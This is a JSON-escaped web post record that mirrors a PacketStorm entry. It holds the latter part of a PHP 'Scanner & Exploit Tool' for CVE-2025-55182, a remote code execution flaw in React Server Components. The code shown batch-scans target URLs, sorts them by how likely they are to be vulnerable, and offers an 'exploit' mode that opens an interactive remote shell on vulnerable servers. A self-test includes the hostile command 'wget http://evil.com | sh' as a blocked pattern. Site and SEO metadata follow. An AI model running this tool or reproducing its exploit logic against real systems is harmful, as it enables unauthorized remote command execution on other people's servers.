=\\u003e [],\\n ‘not_vulnerable’ =\\u003e [],\\n ‘errors’ =\\u003e []\\n ];\\n \\n $start_time = time();\\n \\n foreach ($urls as $index =\\u003e $url) {\\n $url = trim($url);\\n if (empty($url)) continue;\\n \\n $current = $index + 1;\\n $total = count($urls);\\n $percent = round(($current \/ $total) * 100, 1);\\n $elapsed = time() – $start_time;\\n $eta = $total \\u003e 0 ? round(($elapsed \/ $current) * ($total – $current)) : 0;\\n \\n $this-\\u003eprint_info(\\”Scanning [{$current}\/{$total}] ({$percent}%) ETA: {$eta}s – {$url}\\”);\\n \\n try {\\n $result = $this-\\u003escan($url, false);\\n \\n if ($result[‘vulnerable’]) {\\n switch ($result[‘confidence’]) {\\n case ‘high’:\\n $results[‘high_confidence’][] = $url;\\n break;\\n case ‘medium’:\\n $results[‘medium_confidence’][] = $url;\\n break;\\n case ‘low’:\\n $results[‘low_confidence’][] = $url;\\n break;\\n }\\n } else {\\n $results[‘not_vulnerable’][] = $url;\\n }\\n } catch (Exception $e) {\\n $results[‘errors’][] = $url . \\” – \\” . $e-\\u003egetMessage();\\n }\\n \\n \/\/ Progress delay\\n usleep(300000); \/\/ 300ms\\n }\\n \\n \/\/ Generate report\\n $this-\\u003eprint_info(\\”\\\\n\\” . str_repeat(\\”=\\”, 60));\\n $this-\\u003eprint_info(\\”BATCH SCAN COMPLETE\\”);\\n $this-\\u003eprint_info(\\”Total time: \\” . (time() – $start_time) . \\” seconds\\”);\\n $this-\\u003eprint_info(str_repeat(\\”-\\”, 60));\\n \\n $categories = [\\n ‘high_confidence’ =\\u003e [‘High Confidence Vulnerable’, $this-\\u003ecolor(‘GREEN’)],\\n ‘medium_confidence’ =\\u003e [‘Medium Confidence Vulnerable’, $this-\\u003ecolor(‘WARNING’)],\\n ‘low_confidence’ =\\u003e [‘Low Confidence Vulnerable’, $this-\\u003ecolor(‘CYAN’)],\\n ‘not_vulnerable’ =\\u003e [‘Not Vulnerable’, $this-\\u003ecolor(‘FAIL’)],\\n ‘errors’ =\\u003e [‘Errors’, $this-\\u003ecolor(‘FAIL’)]\\n ];\\n \\n foreach ($categories as $key =\\u003e [$label, $color]) {\\n $count = count($results[$key]);\\n echo $color . \\”[*] \\” . str_pad($label, 30) . \\”: \\” . $count . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n }\\n \\n \/\/ Save report if requested\\n if ($output_report) {\\n $report_file = ‘cve_scan_report_’ . date(‘Y-m-d_H-i-s’) . ‘.txt’;\\n $report_content = \\”CVE-2025-55182 Scan Report\\\\n\\”;\\n $report_content .= \\”Generated: \\” . date(‘Y-m-d H:i:s’) . \\”\\\\n\\”;\\n $report_content .= \\”Total URLs: \\” . count($urls) . \\”\\\\n\\\\n\\”;\\n \\n foreach ($categories as $key =\\u003e [$label, $color]) {\\n $report_content .= \\”\\\\n=== {$label} ===\\\\n\\”;\\n foreach ($results[$key] as $item) {\\n $report_content .= $item . \\”\\\\n\\”;\\n }\\n }\\n \\n file_put_contents($report_file, $report_content);\\n $this-\\u003eprint_success(\\”Detailed report saved to: {$report_file}\\”);\\n }\\n \\n return $results;\\n }\\n \\n private function print_banner() {\\n $banner = $this-\\u003ecolor(‘HEADER’) . $this-\\u003ecolor(‘BOLD’) . \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 CVE-2025-55182 Scanner \\u0026 Exploit Tool \u2551\\n \u2551 React Server Components RCE Vulnerability \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\” . $this-\\u003ecolor(‘ENDC’) . \\”\\n \\n \\” . $this-\\u003ecolor(‘CYAN’) . \\”[*] Features:\\” . $this-\\u003ecolor(‘ENDC’) . \\”\\n \u2022 Multi-payload support for different environments\\n \u2022 Command validation and sanitization\\n \u2022 Confidence-based vulnerability detection\\n \u2022 Interactive shell with command history\\n \u2022 Batch scanning with detailed reporting\\n \u2022 Safe mode to prevent dangerous commands\\n \\n \\” . $this-\\u003ecolor(‘WARNING’) . \\”[!] SECURITY WARNING:\\” . $this-\\u003ecolor(‘ENDC’) . \\”\\n \u2022 This tool is for AUTHORIZED security testing ONLY\\n \u2022 Unauthorized use is ILLEGAL and UNETHICAL\\n \u2022 Use only on systems you OWN or have PERMISSION to test\\n \\n \\” . $this-\\u003ecolor(‘FAIL’) . $this-\\u003ecolor(‘BOLD’) . \\”[!] LEGAL NOTICE: You are responsible for your actions!\\” . $this-\\u003ecolor(‘ENDC’) . \\”\\n \\”;\\n \\n echo $banner . PHP_EOL;\\n }\\n \\n public function run() {\\n $this-\\u003eprint_banner();\\n \\n if (PHP_SAPI !== ‘cli’) {\\n $this-\\u003eprint_error(\\”This tool must be run from command line.\\”);\\n echo \\”For web interface, use the separate web version.\\” . PHP_EOL;\\n exit(1);\\n }\\n \\n global $argv;\\n \\n if (count($argv) \\u003c 2) {\\n $this-\\u003eshow_help();\\n exit(1);\\n }\\n \\n $mode = $argv[1];\\n \\n switch ($mode) {\\n case ‘scan’:\\n if (isset($argv[2]) \\u0026\\u0026 $argv[2] === ‘-u’ \\u0026\\u0026 isset($argv[3])) {\\n $this-\\u003escan($argv[3], true);\\n } elseif (isset($argv[2]) \\u0026\\u0026 $argv[2] === ‘-f’ \\u0026\\u0026 isset($argv[3])) {\\n $this-\\u003ebatch_scan($argv[3]);\\n } else {\\n $this-\\u003eshow_help();\\n }\\n break;\\n \\n case ‘exploit’:\\n if (isset($argv[2]) \\u0026\\u0026 $argv[2] === ‘-u’ \\u0026\\u0026 isset($argv[3])) {\\n $this-\\u003eexploit($argv[3]);\\n } else {\\n $this-\\u003eshow_help();\\n }\\n break;\\n \\n case ‘test’:\\n $this-\\u003etest_mode();\\n break;\\n \\n case ‘help’:\\n case ‘–help’:\\n case ‘-h’:\\n $this-\\u003eshow_help();\\n break;\\n \\n default:\\n $this-\\u003eprint_error(\\”Unknown mode: {$mode}\\”);\\n $this-\\u003eshow_help();\\n exit(1);\\n }\\n }\\n \\n private function test_mode() {\\n $this-\\u003eprint_info(\\”Running comprehensive self-test…\\”);\\n \\n \/\/ Test token generation\\n $token = $this-\\u003egenerate_token(10);\\n $this-\\u003eprint_success(\\”Token generation: OK ({$token})\\”);\\n \\n \/\/ Test command validation\\n $test_cmds = [\\n ‘echo test’ =\\u003e true,\\n ‘whoami’ =\\u003e true,\\n ‘ls -la’ =\\u003e true,\\n str_repeat(‘a’, 201) =\\u003e false, \/\/ Too long\\n ‘rm -rf \/’ =\\u003e false, \/\/ Dangerous\\n ‘wget http:\/\/evil.com | sh’ =\\u003e false \/\/ Dangerous pattern\\n ];\\n \\n foreach ($test_cmds as $cmd =\\u003e $expected) {\\n $result = $this-\\u003evalidate_command($cmd);\\n $status = $result === $expected ? ‘OK’ : ‘FAIL’;\\n $color = $result === $expected ? ‘GREEN’ : ‘FAIL’;\\n echo $this-\\u003ecolor($color) . \\”[TEST] Command validation ‘{$cmd}’: {$status}\\” . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n }\\n \\n \/\/ Test payload building\\n $payload = $this-\\u003ebuild_payload(‘test’);\\n $json_test = json_decode($payload, true);\\n $this-\\u003eprint_success(\\”Payload building: \\” . (json_last_error() === JSON_ERROR_NONE ? ‘OK’ : ‘FAIL’));\\n \\n \/\/ Test required functions\\n $required = [‘json_encode’, ‘file_get_contents’, ‘random_bytes’, ‘preg_match’];\\n $all_ok = true;\\n \\n foreach ($required as $func) {\\n if (!function_exists($func)) {\\n $this-\\u003eprint_error(\\”Missing function: {$func}\\”);\\n $all_ok = false;\\n }\\n }\\n \\n if ($all_ok) {\\n $this-\\u003eprint_success(\\”All required functions available\\”);\\n }\\n \\n $this-\\u003eprint_info(\\”Self-test completed.\\”);\\n }\\n \\n private function show_help() {\\n echo $this-\\u003ecolor(‘BOLD’) . \\”CVE-2025-55182 Enhanced Scanner \\u0026 Exploit Tool\\” . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n echo $this-\\u003ecolor(‘CYAN’) . \\”Version: 2.0 | Enhanced Security Edition\\” . $this-\\u003ecolor(‘ENDC’) . PHP_EOL . PHP_EOL;\\n \\n echo \\”Usage:\\” . PHP_EOL;\\n echo \\” php \\” . basename(__FILE__) . \\” [mode] [options]\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”Modes:\\” . PHP_EOL;\\n echo \\” scan – Check target vulnerability (detailed analysis)\\” . PHP_EOL;\\n echo \\” exploit – Interactive exploit shell (requires vulnerable target)\\” . PHP_EOL;\\n echo \\” test – Run self-test to verify functionality\\” . PHP_EOL;\\n echo \\” help – Show this help message\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”Scan Options:\\” . PHP_EOL;\\n echo \\” -u URL – Single target URL (detailed scan)\\” . PHP_EOL;\\n echo \\” -f FILE – File containing list of URLs (batch scan)\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”Exploit Options:\\” . PHP_EOL;\\n echo \\” -u URL – Target URL to exploit (interactive shell)\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”Security Features:\\” . PHP_EOL;\\n echo \\” \u2022 Command length limitation (max 200 chars)\\” . PHP_EOL;\\n echo \\” \u2022 Dangerous command blocking\\” . PHP_EOL;\\n echo \\” \u2022 Confidence-based vulnerability detection\\” . PHP_EOL;\\n echo \\” \u2022 Safe mode for interactive shell\\” . PHP_EOL . PHP_EOL;\\n \\n echo \\”Examples:\\” . PHP_EOL;\\n echo \\” php \\” . basename(__FILE__) . \\” scan -u https:\/\/target.com\/api\\” . PHP_EOL;\\n echo \\” php \\” . basename(__FILE__) . \\” scan -f targets.txt\\” . PHP_EOL;\\n echo \\” php \\” . basename(__FILE__) . \\” exploit -u https:\/\/target.com\/api\\” . PHP_EOL;\\n echo \\” php \\” . basename(__FILE__) . \\” test\\” . PHP_EOL;\\n \\n echo $this-\\u003ecolor(‘WARNING’) . PHP_EOL . \\”[!] Legal Notice: For authorized testing only!\\” . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n echo $this-\\u003ecolor(‘FAIL’) . \\”[!] By using this tool, you accept full responsibility for your actions.\\” . $this-\\u003ecolor(‘ENDC’) . PHP_EOL;\\n }\\n }\\n \\n \/\/ Main execution\\n if (PHP_SAPI === ‘cli’ \\u0026\\u0026 isset($argv[0]) \\u0026\\u0026 basename($argv[0]) === basename(__FILE__)) {\\n $scanner = new CVE_2025_55182_Scanner_Secure();\\n $scanner-\\u003erun();\\n }\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212606″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212606\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-09T17:44:40″,”description”:”This project delivers a PHP-based vulnerability scanner and remote code execution exploit for CVE\u20112025\u201155182 affecting React Server Components. It leverages RSC serialization weaknesses to execute…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-29733","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution_PACKETSTORM:212606 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=29733\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution_PACKETSTORM:212606 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-09T17:44:40″,”description”:”This project delivers a PHP-based vulnerability scanner and remote code execution exploit for CVE\u20112025\u201155182 affecting React Server Components. It leverages RSC serialization weaknesses to execute...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=29733\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-09T12:37:33+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"26 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29733#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29733\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 React 19.2.0 PHP Scanner \\\/ Remote Code Execution_PACKETSTORM:212606\",\"datePublished\":\"2025-12-09T12:37:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29733\"},\"wordCount\":5125,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29733#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29733\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29733\",\"name\":\"\ud83d\udcc4 React 19.2.0 PHP Scanner \\\/ Remote Code Execution_PACKETSTORM:212606 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-09T12:37:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29733#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29733\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29733#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 React 19.2.0 PHP Scanner \\\/ Remote Code Execution_PACKETSTORM:212606\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution_PACKETSTORM:212606 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=29733","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution_PACKETSTORM:212606 - zero redgem","og_description":"{“lastseen”:”2025-12-09T17:44:40″,”description”:”This project delivers a PHP-based vulnerability scanner and remote code execution exploit for CVE\u20112025\u201155182 affecting React Server Components. It leverages RSC serialization weaknesses to execute...","og_url":"https:\/\/zero.redgem.net\/?p=29733","og_site_name":"zero redgem","article_published_time":"2025-12-09T12:37:33+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"26 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=29733#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=29733"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution_PACKETSTORM:212606","datePublished":"2025-12-09T12:37:33+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=29733"},"wordCount":5125,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=29733#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=29733","url":"https:\/\/zero.redgem.net\/?p=29733","name":"\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution_PACKETSTORM:212606 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-09T12:37:33+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=29733#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=29733"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=29733#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 React 19.2.0 PHP Scanner \/ Remote Code Execution_PACKETSTORM:212606"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29733","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29733"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29733\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29733"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=29733"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=29733"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}